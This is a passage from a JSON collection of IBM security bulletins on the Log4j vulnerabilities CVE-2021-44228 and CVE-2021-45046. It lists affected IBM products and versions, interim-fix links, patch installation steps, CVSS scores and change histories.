http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n**Details of the ElasticSearch remediation for IBM Cloud Private Version 3.2.1 and 3.2.2**\n\nThe ibm-icplogging component has been updated to use Elasticsearch 6.8.22. This release upgrades the Log4j package to 2.17.0, which remediates the log4j vulnerabilities and should not trigger false positives in vulnerability scanners as was the case with Elasticsearch 6.8.21. \n\nElasticsearch announcement (ESA-2021-31)\n\n<https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476>\n\n**Details of the ElasticSearch remediation for IBM Cloud Private Version 3.1.0, 3.1.1, 3.1.2, and 3.2.0**\n\nElasticsearch and Logstash within ibm-icplogging component have been updated to remediate the log4j vulnerabilities by removing the vulnerable JndiLookup class from the log4j-core package. Some vulnerability scanners may continue to flag Elasticsearch in association with this vulnerability based on the Log4j version alone. 
However, the mitigation sufficiently protects both remote code execution and information leakage.\n\nElasticsearch 5.0.0-5.6.10 and 6.0.0-6.3.2: Log4j CVE-2021-44228, CVE-2021-45046 remediation\n\n<https://discuss.elastic.co/t/elasticsearch-5-0-0-5-6-10-and-6-0-0-6-3-2-log4j-cve-2021-44228-cve-2021-45046-remediation/292054>\n\nLogstash 5.0.0-6.8.20 and 7.0.0-7.16.0: Log4j CVE-2021-44228, CVE-2021-45046 remediation\n\n<https://discuss.elastic.co/t/logstash-5-0-0-6-8-20-and-7-0-0-7-16-0-log4j-cve-2021-44228-cve-2021-45046-remediation/292343>\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Dec 2021: Initial Publication \n21 Dec 2021: Patch updated to include Elasticsearch 6.8.22 which includes Log4j 2.17.0. \n22 Dec 2021: Add patch links for 3.1.1, 3.1.2, 3.2.0 \n18 Jan 2022: Add patch link for 3.1.0\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSBS6K\",\"label\":\"IBM Cloud Private\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"all\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T12:20:25", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Cloud Private (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-27T12:20:25", "id": "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "href": "https://www.ibm.com/support/pages/node/6528268", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-16T19:27:50", "description": "## Summary\n\nApache Log4j is used by IBM\u00ae QRadar Risk Manager to log system 
events. This bulletin provides a remediation to address the multiple Apache Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45046 ) by upgrading IBM\u00ae QRadar Risk Manager.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. A remote attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to obtain sensitive information and execute arbitrary code on the system. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM QRadar Risk Manager 7.3.0 - 7.3.3 Fix Pack 10\n\nIBM QRadar Risk Manager 7.4.0 - 7.4.3 Fix Pack 4\n\n## Remediation/Fixes\n\n**IBM strongly recommends upgrading now to address the Apache Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45046) affecting QRadar Risk Manager**\n\n**Note:**\n\nMany QRadar products share a common install; as such, to upgrade QRadar Risk Manager, customers need to download the interim fixes linked below. \n\n**Customers who do not use QRadar Risk Manager can also apply this fix to update the unused vulnerable components.**\n\n[QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 10 Interim Fix 01](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FOther+software%2FIBM+Security+QRadar+Vulnerability+Manager&fixids=7.3.3-QRADAR-QRSIEM-20211217150724INT&source=SAR&function=fixId&parent=IBM%20Security> \"QRadar / QRM / QVM / QRIF / QNI 7.3.3 Patch 10 Interim Fix 01\" )\n\n[QRadar / QRM / QVM / QRIF / QNI 7.4.3 Patch 4 Interim Fix 02](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FOther+software%2FIBM+Security+QRadar+Vulnerability+Manager&fixids=7.4.3-QRADAR-QRSIEM-20211217150701INT&source=SAR&function=fixId&parent=IBM%20Security> \"QRadar / QRM / QVM / QRIF / QNI 7.4.3 Patch 4 Interim Fix 02\" )\n\nFor information on upgrading QRadar, please see the appropriate documentation:\n\n[Upgrading 7.3.3](<https://www.ibm.com/docs/en/qsip/7.3.3?topic=upgrading-qradar-v733> \"Upgrading 7.3.3\" )\n\n[Upgrading 7.4](<https://www.ibm.com/docs/en/qsip/7.4?topic=upgrading-qradar-siem> \"Upgrading 7.4\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 
Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nNote: QRadar software upgrades use a single SFS file to update multiple products. The interim fix applies mitigations to IBM QRadar Risk Manager, along with IBM QRadar SIEM and other products, even if the software does not require any mitigations. For more information on affected products, see [QRadar: Addendum to Apache Log4j CVE-2021-44228 vulnerability information](<https://www.ibm.com/support/pages/node/6526712>). \n\n## Acknowledgement\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSBQAC\",\"label\":\"IBM QRadar SIEM\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.3, 7.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T16:37:57", "type": "ibm", "title": "Security Bulletin: There are multiple vulnerabilities in the Apache Log4j used in IBM\u00ae QRadar Risk Manager that may allow for remote code execution (RCE).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-07T16:37:57", "id": "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "href": "https://www.ibm.com/support/pages/node/6528440", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## 
Abstract\n\nIBM Cognos Controller is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Controller as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-45046) vulnerability. Please note that this update also addresses CVE-2021-44228.\n\n## Download Description\n\nApply the following interim fix to all IBM Cognos Controller 10.4.2 installations as soon as possible.\n\nRelease | File \n---|--- \n10.4.2 IF16 | 10.4.2000.1108 \n \n \n \n\n\n## Prerequisites\n\nIBM Cognos Controller 10.4.2 Interim Fix 16 requires that IBM Cognos Controller 10.4.2 is installed.\n\nOur interim fixes are cumulative by design. Hence all interim fixes include all updates from earlier interim fixes.\n\n## Installation Instructions\n\n**Install an interim fix on Microsoft\u00ae Windows\u00ae **\n\n 1. Change to the directory where you have downloaded the interim fix.\n 2. Decompress the .tar.gz file. If you are using WinZip**\u00ae**, select the option \"use folder names\".\n 3. If you want to see the version of a component before you install it, unpack the tar file to disk, or read the table of contents of the tar file.\n 4. Stop Internet Information Services (IIS) Manager (the Default Web Site).\n 5. Shut down the IBM Cognos Controller Consolidation COM+ application through Component Services.\n 6. Stop the following services through the Services Manager. If you do not stop them before the installation, you are prompted during the installation: \n * IBM Cognos\n * IBM Cognos Controller Batch Service\n * IBM Cognos Controller Consolidation\n * IBM Cognos Controller Java Proxy\n * IBM Cognos Controller User Manager\n * IBM Cognos FAP Service\n 7. Back up the content store database.\n 8. If your IBM Cognos Controller environment is customized, back up the entire IBM Cognos Controller location.\n 9. Go to the location where you downloaded and extracted the files.\n 10. 
Go to the _win64h_ directory and double-click the _issetup.exe_ file.\n 11. Follow the directions in the installation wizard, installing in the same location as your existing IBM Cognos Controller server components. The issetup program prompts you to allow the interim fix to create a backup copy in the installation folder before copying new files.\n 12. Open IBM Cognos Configuration, save the configuration, and then start the IBM Cognos service.\n 13. Start the following services: \n * IBM Cognos Controller Batch Service\n * IBM Cognos Controller Consolidation\n * IBM Cognos Controller Java Proxy\n * IBM Cognos Controller User Manager\n * IBM Cognos FAP Service\n 14. If you have a distributed environment, repeat these steps for all remaining IBM Cognos Controller servers.\n 15. Start the Internet Information Services (IIS) Manager (the Default Web Site).\n 16. Start the IBM Cognos Controller Consolidation COM+ application through Component Services.\n\n[{\"INLabel\":\"IBM Cognos Controller Installation Guide\",\"INLang\":\"English\",\"INSize\":\"1000000 B\",\"INURL\":\"https://www.ibm.com/docs/en/cognos-controller/10.4.2?topic=1042-introduction\\n\\n\"}] \n\n## Download Package\n\nClick the **FC** link in the **Use Fix Central** section below to start downloading your package.\n\n## Problems Solved\n\nRemediated [Security Vulnerabilities](<https://www.ibm.com/support/pages/node/6528580>)\n\nOn \n\n[{\"DNLabel\":\"IBM Cognos Controller 10.4.2 Interim Fix 16\",\"DNDate\":\"21 Dec 2021\",\"DNLang\":\"English\",\"DNSize\":\"2.25 GB\",\"DNPlat\":{\"label\":\"Windows\",\"code\":\"PF033\"},\"DNURL\":\"https://www-945.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Cognos+8+Controller&release=All&platform=All&function=fixId&fixids=10.4.2.0-BA-CNTRL-Win64-IF016:0&includeSupersedes=0&source=fc&login=true\",\"DNURL_FTP\":\"\",\"DDURL\":null}] \n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and 
AI\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9S6B\",\"label\":\"IBM Cognos Controller\"},\"ARM Category\":[{\"code\":\"a8m0z0000001ftoAAA\",\"label\":\"Other\"}],\"ARM Case Number\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"10.4.2\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T06:02:48", "type": "ibm", "title": "Download IBM Cognos Controller 10.4.2 IF16", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-21T06:02:48", "id": "39C439A440712A8825FAF249AE9256D154F422331B554EA4FEF0A1953F90EEE0", "href": "https://www.ibm.com/support/pages/node/6528424", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nA vulnerability was identified within the Apache Log4j library that is used by IBM Tivoli Netcool Impact to provide logging functionality. This vulnerability has been addressed. 
\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. A remote attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to obtain sensitive information and execute arbitrary code on the system. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool Impact| 7.1.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by applying the interim fix below:\n\nProduct Name| VRMF| APAR| Remediation/First Fix \n---|---|---|--- \nIBM Tivoli Netcool Impact| 7.1.0.18 ~ 7.1.0.24| IJ36516| **For 7.1.0.18 through 7.1.0.24:** Apply Interim Fix [7.1.0-TIV-NCI-IF0010](<https://www.ibm.com/support/pages/node/6536702> \"7.1.0-TIV-NCI-IF0010\" ) \n \n## Workarounds and Mitigations\n\nIBM strongly recommends applying the interim fix now.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product 
Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSHYH\",\"label\":\"Tivoli Netcool\\/Impact\"},\"Component\":\"-\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"7.1.0\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-06T15:27:17", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j 
affects IBM Tivoli Netcool Impact (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-06T15:27:17", "id": "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "href": "https://www.ibm.com/support/pages/node/6528374", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-11T13:43:26", "description": "## Summary\n\nThe Operations Dashboard has addressed the following CVE-2021-45046 vulnerability. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nOperations Dashboard| 2020.4.1 \n2021.1.1 \n2021.2.1 \n2021.3.1 \n2021.4.1 \n \n## Remediation/Fixes\n\n**Operations Dashboard version 2020.4.1 in IBM Cloud Pak for Integration** \nUpgrade Operations Dashboard to 2020.4.1-6-eus using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2020.4?topic=components-upgrading-operations-dashboard> \n \n**Operations Dashboard version 2021.1.1, 2021.2.1, 2021.3.1, and 2021.4.1 in IBM Cloud Pak for Integration** \nUpgrade Operations Dashboard to 2021.4.1-2 using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2021.4?topic=capabilities-upgrading-integration-tracing>\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n18 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud \\u0026 Data Platform\"},\"Product\":{\"code\":\"SSCL60\",\"label\":\"Cloud Platform\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"All\",\"Edition\":\"\"},{\"Business Unit\":{\"code\":\"BU004\",\"label\":\"Hybrid Cloud\"},\"Product\":{\"code\":\"SSYMXC\",\"label\":\"IBM Cloud Pak for Integration\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"All\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-11T12:26:59", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects Operations Dashboard ( CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-11T12:26:59", "id": "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "href": "https://www.ibm.com/support/pages/node/6536724", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-28T23:40:10", "description": "## Summary\n\nApache Log4j is used by IBM Cloud Pak for Data System 1.0 in openshift-logging. This bulletin provides a remediation and workaround for the Apache Log4j vulnerability (CVE-2021-45046). \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \n \nIBM Cloud Pak for Data System (ICPDS) 1.0 - Openshift Container Platform 3.11\n\n| 1.0.0.0- 1.0.7.7 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by applying below patch. The remediation is applicable to ICPDS v1.0.7.6 - 1.0.7.7 releases. **\n\n**Product**| VRMF| Remediation / Fix \n---|---|--- \n \nIBM Cloud Pak for Data System 1.0 - Openshift Container Platform 3.11\n\n| `1.0.0.0-openshift-3.11.log4j-WS-ICPDS-fp136`| [Link to Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FWebSphere%2FIBM+Cloud+Private+for+Data+System&fixids=1.0.0.0-openshift-3.11.log4j-WS-ICPDS-fp136&source=SAR&function=fixId&parent=ibm/WebSphere>) \n \n * Please follow the steps given in **[release 